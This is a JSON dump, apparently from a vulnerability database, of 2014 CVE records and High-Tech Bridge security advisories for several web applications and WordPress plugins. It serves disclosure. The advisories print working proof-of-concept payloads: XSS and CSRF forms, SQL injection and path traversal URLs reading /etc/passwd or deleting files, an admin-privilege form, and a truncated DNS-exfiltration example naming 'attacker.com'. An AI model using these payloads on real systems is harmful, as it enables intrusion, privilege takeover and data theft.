{"cve": [{"lastseen": "2016-09-03T20:16:25", "references": ["http://www.securityfocus.com/bid/66667", "https://www.htbridge.com/advisory/HTB23208", "http://www.securityfocus.com/archive/1/archive/1/531781/100/0/threaded", "http://www.exploit-db.com/exploits/32792"], "edition": 1, "description": "SQL injection vulnerability in OrbitScripts Orbit Open Ad Server before 1.1.1 allows remote attackers to execute arbitrary SQL commands via the site_directory_sort_field parameter to guest/site_directory.", "reporter": "NVD", "published": "2014-04-11T10:55:05", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CVE-2014-2540", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-2540"], "scanner": [], "modified": "2014-04-14T10:27:34", "cpe": ["cpe:/a:orbitscripts:orbit_open_ad_server:1.1.0"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2540", "id": "CVE-2014-2540", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T20:08:20", "references": ["https://www.htbridge.com/advisory/HTB23199"], "edition": 1, "description": "Unrestricted file upload vulnerability in ls/vw_snapshots.php in the VideoWhisper Live Streaming Integration plugin before 4.29.5 for WordPress allows remote attackers to execute arbitrary PHP code by uploading a file with a double extension, and then accessing the file via a direct request to a wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/ pathname, as demonstrated by a .php.jpg filename.", "reporter": "NVD", "published": "2014-12-29T15:59:00", "title": "CVE-2014-1905", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-1905"], "scanner": [], "modified": "2014-12-30T11:37:00", "cpe": ["cpe:/a:videowhisper:videowhisper_live_streaming_integration:4.27.4::~~~wordpress~~"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1905", "id": "CVE-2014-1905", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T10:48:11", "references": ["http://packetstormsecurity.com/files/125454", "https://www.htbridge.com/advisory/HTB23199", "https://exchange.xforce.ibmcloud.com/vulnerabilities/91477"], "edition": 2, "description": "Multiple cross-site scripting (XSS) vulnerabilities in the VideoWhisper Live Streaming Integration plugin before 4.29.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) m parameter to lb_status.php; (2) msg parameter to vc_chatlog.php; n parameter to (3) channel.php, (4) htmlchat.php, (5) video.php, or (6) videotext.php; (7) message parameter to lb_logout.php; or ct parameter to (8) lb_status.php or (9) v_status.php in ls/.", "reporter": "NVD", "published": "2014-03-06T10:55:28", "title": "CVE-2014-1906", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-1906"], "scanner": [], "cpe": ["cpe:/a:videowhisper:live_streaming_integration_plugin:4.05", "cpe:/a:videowhisper:live_streaming_integration_plugin:2.0", "cpe:/a:videowhisper:live_streaming_integration_plugin:2.1", "cpe:/a:videowhisper:live_streaming_integration_plugin:1.0.2", "cpe:/a:videowhisper:live_streaming_integration_plugin:4.07", "cpe:/a:videowhisper:live_streaming_integration_plugin:4.25.3", "cpe:/a:videowhisper:live_streaming_integration_plugin:4.27.4", "cpe:/a:videowhisper:live_streaming_integration_plugin:2.2", "cpe:/a:videowhisper:live_streaming_integration_plugin:4.27.3", "cpe:/a:videowhisper:live_streaming_integration_plugin:4.27", "cpe:/a:videowhisper:live_streaming_integration_plugin:4.25"], "modified": "2017-08-28T21:34:28", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1906", "id": "CVE-2014-1906", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T20:12:00", "references": ["http://www.securityfocus.com/archive/1/archive/1/531527/100/0/threaded", "http://www.securityfocus.com/bid/66312", "https://www.htbridge.com/advisory/HTB23205"], "edition": 1, "description": "Cross-site scripting (XSS) vulnerability in whizzywig/wb.php in CMSimple Classic 3.54 and earlier, possibly as downloaded before February 26, 2014, allows remote attackers to inject arbitrary web script or HTML via the d parameter.", "reporter": "NVD", "published": "2014-03-20T12:55:17", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2014-2219", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-2219"], "scanner": [], "cpe": ["cpe:/a:cmsimple:cmsimple_classic:3.5.4"], "modified": "2015-08-07T14:14:55", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2219", "id": "CVE-2014-2219", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-08-29T10:48:13", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/92545", "http://www.securityfocus.com/archive/1/archive/1/531848/100/0/threaded", "http://www.securityfocus.com/bid/66661", "https://www.htbridge.com/advisory/HTB23209"], "edition": 2, "description": "Multiple SQL injection vulnerabilities in MobFox mAdserve 2.0 and earlier allow remote authenticated users to execute arbitrary SQL commands via the id parameter to (1) edit_ad_unit.php, (2) view_adunits.php, or (3) edit_campaign.php in www/cp/.", "reporter": "NVD", "published": "2014-04-22T10:23:35", "title": "CVE-2014-2654", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-2654"], "scanner": [], "cpe": ["cpe:/a:mobfox:madserve:2.0"], "modified": "2017-08-28T21:34:33", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2654", "id": "CVE-2014-2654", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-19T11:19:06", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/91577", "https://www.htbridge.com/advisory/HTB23202", "http://www.securityfocus.com/archive/1/archive/1/531351/100/0/threaded"], "description": "OpenDocMan 1.2.7 and earlier does not properly validate allowed actions, which allows remote authenticated users to bypass an intended access restrictions and assign administrative privileges to themselves via a crafted request to signup.php.", "edition": 2, "reporter": "NVD", "published": "2018-04-10T11:29:00", "title": "CVE-2014-1946", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-1946"], "scanner": [], "modified": "2018-05-18T09:12:25", "cpe": ["cpe:/a:opendocman:opendocman:1.2.7"], "id": "CVE-2014-1946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1946", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T20:18:09", "references": ["http://www.securityfocus.com/bid/67069", "http://www.securityfocus.com/archive/1/archive/1/531935/100/0/threaded"], "edition": 1, "description": "Multiple cross-site scripting (XSS) vulnerabilities in vwrooms\\templates\\logout.tpl.php in the VideoWhisper Webcam plugins for Drupal 7.x allow remote attackers to inject arbitrary web script or HTML via the (1) module or (2) message parameter to index.php.", "reporter": "NVD", "published": "2014-04-28T10:09:07", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2014-2715", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-2715"], "scanner": [], "modified": "2015-10-08T11:02:56", "cpe": ["cpe:/a:videowhisper:videowhisper:7.x-1.1::~~~drupal~~", "cpe:/a:videowhisper:videowhisper:7.x-1.0::~~~drupal~~", "cpe:/a:videowhisper:videowhisper:7.x-1.3::~~~drupal~~", "cpe:/a:videowhisper:videowhisper:7.x-1.x:dev:~~~drupal~~"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2715", "id": "CVE-2014-2715", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T19:46:43", "references": ["http://mail-archives.us.apache.org/mod_mbox/www-announce/201404.mbox/%3C534CE273.9020601@apache.org%3E", "http://www.securityfocus.com/archive/1/archive/1/531841/100/0/threaded", "http://syncope.apache.org/security.html"], "edition": 1, "description": "Apache Syncope 1.0.0 before 1.0.9 and 1.1.0 before 1.1.7 allows remote administrators to execute arbitrary Java code via vectors related to Apache Commons JEXL expressions, \"derived schema definition,\" \"user / role templates,\" and \"account links of resource mappings.\"", "reporter": "NVD", "published": "2014-04-17T10:55:06", "title": "CVE-2014-0111", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-0111"], "scanner": [], "cpe": ["cpe:/a:apache:syncope:1.0.6", "cpe:/a:apache:syncope:1.0.5", "cpe:/a:apache:syncope:1.0.8", "cpe:/a:apache:syncope:1.0.4", "cpe:/a:apache:syncope:1.1.4", "cpe:/a:apache:syncope:1.1.6", "cpe:/a:apache:syncope:1.0.7", "cpe:/a:apache:syncope:1.1.0", "cpe:/a:apache:syncope:1.0.3", "cpe:/a:apache:syncope:1.0.1", "cpe:/a:apache:syncope:1.1.3", "cpe:/a:apache:syncope:1.0.0", "cpe:/a:apache:syncope:1.1.5", "cpe:/a:apache:syncope:1.1.2", "cpe:/a:apache:syncope:1.0.2", "cpe:/a:apache:syncope:1.1.1"], "modified": "2014-05-09T08:12:47", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0111", "id": "CVE-2014-0111", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T20:18:13", "references": ["http://packetstormsecurity.com/files/126187/Ektron-CMS-8.7-Cross-Site-Scripting.html", "http://www.securityfocus.com/archive/1/archive/1/531852/100/0/threaded", "http://www.securityfocus.com/archive/1/archive/1/531853/100/0/threaded"], "edition": 1, "description": "Cross-site scripting (XSS) vulnerability in content.aspx in Ektron CMS 8.7 before 8.7.0.055 allows remote authenticated users to inject arbitrary web script or HTML via the category0 parameter, which is not properly handled when displaying the Subjects tab in the View Properties menu option.", "reporter": "NVD", "published": "2014-04-25T10:15:30", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2014-2729", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-2729"], "scanner": [], "modified": "2014-04-25T13:51:50", "cpe": ["cpe:/a:ektron:ektron_content_management_system:8.7.0"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2729", "id": "CVE-2014-2729", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-08-29T10:48:11", "references": ["http://www.exploit-db.com/exploits/31834", "http://www.securityfocus.com/bid/65709", "http://www.securityfocus.com/archive/1/archive/1/531176/100/0/threaded", "https://exchange.xforce.ibmcloud.com/vulnerabilities/91253", "https://www.htbridge.com/advisory/HTB23201", "http://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5"], "edition": 2, "description": "SQL injection vulnerability in library/clicktracker.php in the AdRotate Pro plugin 3.9 through 3.9.5 and AdRotate Free plugin 3.9 through 3.9.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the track parameter.", "reporter": "NVD", "published": "2014-02-27T10:55:15", "title": "CVE-2014-1854", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-1854"], "scanner": [], "cpe": ["cpe:/a:adrotateplugin:adrotate:3.9.2::~pro~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.::~free~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.::~pro~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.4::~pro~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.3::~free~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.5::~pro~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.1::~pro~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.1::~free~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.2::~free~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.3::~pro~wordpress~~~", "cpe:/a:adrotateplugin:adrotate:3.9.4::~free~wordpress~~~"], "modified": "2017-08-28T21:34:27", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1854", "id": "CVE-2014-1854", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:14", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files. \n \n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905 \nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system. \nThe following PoC code demonstrates exploitation of the vulnerability: \nAfter successful exploitation the remote shell will be accessible via the following URL: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ snapshots/1.php.jpg \nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension. \n \n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906 \n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u2019s widget. The script will be also executed in administrative section on the following page: \nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&t ab=live \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"u\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/vc_chatlog.php\" method=\"post\"> \n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n</form> \n</body> \nThe code will be executed when the user visits the following URL: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ uploads/[room]/Log[date].html \nWhere [room] is set by HTTP POST parameter r and [date] is the current date. \n \n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3 E \n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/lb_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \n<body onLoad=\"document.hack.submit()\"> \n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-integra tion/ls/v_status.php\" method=\"post\"> \n<input type=\"hidden\" name=\"s\" value=\"1\"> \n<input type=\"hidden\" name=\"r\" value=\"1\"> \n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\"> \n</form> \n</body> \n \n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907 \n \n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences. \nThe exploitation example below displays contents of \"/etc/passwd\" file: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp_login.php?s=../../../../../../etc/passwd \n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences. \nThe exploitation example below deletes a file \"/tmp/immuniweb\": \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp_logout.php?s=../../../../../../../../tmp/immuniweb \nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system. \n \n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908 \n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \nThe following URL can be used to gain knowledge of full installation path of the application: \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp. php \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/vid eowhisper_streaming.php \nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/ rtmp.inc.php \n\n", "reporter": "High-Tech Bridge", "published": "2014-02-06T00:00:00", "type": "htbridge", "title": "Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "VideoWhisper Live Streaming Integration", "version": "4.27.3", "operator": "le"}], "cvelist": ["CVE-2014-1907", "CVE-2014-1906", "CVE-2014-1905", "CVE-2014-1908"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-02-07T00:00:00", "id": "HTB23199", "href": "https://www.htbridge.com/advisory/HTB23199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C/"}}, {"lastseen": "2017-06-23T23:08:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. \n \n1) SQL Injection in OpenDocMan: CVE-2014-1945 \nThe vulnerability exists due to insufficient validation of \"add_value\" HTTP GET parameter in \"/ajax_udf.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe exploitation example below displays version of the MySQL server: \nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,versi on%28%29,3,4,5,6,7,8,9 \n \n2) Improper Access Control in OpenDocMan: CVE-2014-1946 \nThe vulnerability exists due to insufficient validation of allowed action in \"/signup.php\" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. \nThe exploitation example below assigns administrative privileges for the current account: \n<form action=\"http://[host]/signup.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"updateuser\" value=\"1\"> \n<input type=\"hidden\" name=\"admin\" value=\"1\"> \n<input type=\"hidden\" name=\"id\" value=\"[USER_ID]\"> \n<input type=\"submit\" name=\"login\" value=\"Run\"> \n</form>\n", "reporter": "High-Tech Bridge", "published": "2014-02-12T00:00:00", "type": "htbridge", "title": "Multiple Vulnerabilities in OpenDocMan", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenDocMan", "version": "1.2.7", "operator": "le"}], "cvelist": ["CVE-2014-1946", "CVE-2014-1945"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-02-25T00:00:00", "id": "HTB23202", "href": "https://www.htbridge.com/advisory/HTB23202", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:14", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website. \n \n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340 \nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup. \nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_clon er&task=confirm\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"dbbackup\" value=\"1\"> \n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\"> \n<input type=\"hidden\" name=\"bname\" value=\"backup\"> \n<input type=\"hidden\" name=\"backupComments\" value=\"\"> \n<input type=\"hidden\" name=\"option\" value=\"com_cloner\"> \n<input type=\"hidden\" name=\"task\" value=\"generate\"> \n<input type=\"hidden\" name=\"boxchecked\" value=\"0\"> \n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\"> \n<input type=\"hidden\" name=\"\" value=\"\"> \n<input type=\"submit\" name=\"run\" value=\"run\"> \n</form> \n<script> \ndocument.main.submit(); \n</script>\n", "reporter": "High-Tech Bridge", "published": "2014-03-12T00:00:00", "type": "htbridge", "title": "\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "XCloner Wordpress plugin", "version": "3.1.0", "operator": "le"}], "cvelist": ["CVE-2014-2340"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-03-13T00:00:00", "id": "HTB23206", "href": "https://www.htbridge.com/advisory/HTB23206", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N/"}}, {"lastseen": "2017-06-23T23:08:17", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in CMSimple, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n1) Reflected Cross-Site Scripting (XSS) in CMSimple: CVE-2014-2219 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in \"d\" HTTP GET parameter passed to \"/whizzywig/wb.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThe exploitation example below uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \nhttp://[host]/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27immuniweb%27%2 9;%3C/script%3E \n\n", "reporter": "High-Tech Bridge", "published": "2014-02-26T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in CMSimple", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "CMSimple", "version": "3.54", "operator": "le"}], "cvelist": ["CVE-2014-2219"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-02-26T00:00:00", "id": "HTB23205", "href": "https://www.htbridge.com/advisory/HTB23205", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}, {"lastseen": "2017-06-23T23:08:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks. \n \n1) SQL Injection in AdRotate: CVE-2014-1854 \nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to \n\"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version: \nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTE gVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ== \nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server: \nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log \n\n", "reporter": "High-Tech Bridge", "published": "2014-01-30T00:00:00", "type": "htbridge", "title": "SQL Injection in AdRotate", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "AdRotate", "version": "3.9.4", "operator": "le"}], "cvelist": ["CVE-2014-1854"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2014-01-31T00:00:00", "id": "HTB23201", "href": "https://www.htbridge.com/advisory/HTB23201", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website. \n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540 \nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\"> \n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\"> \n<input 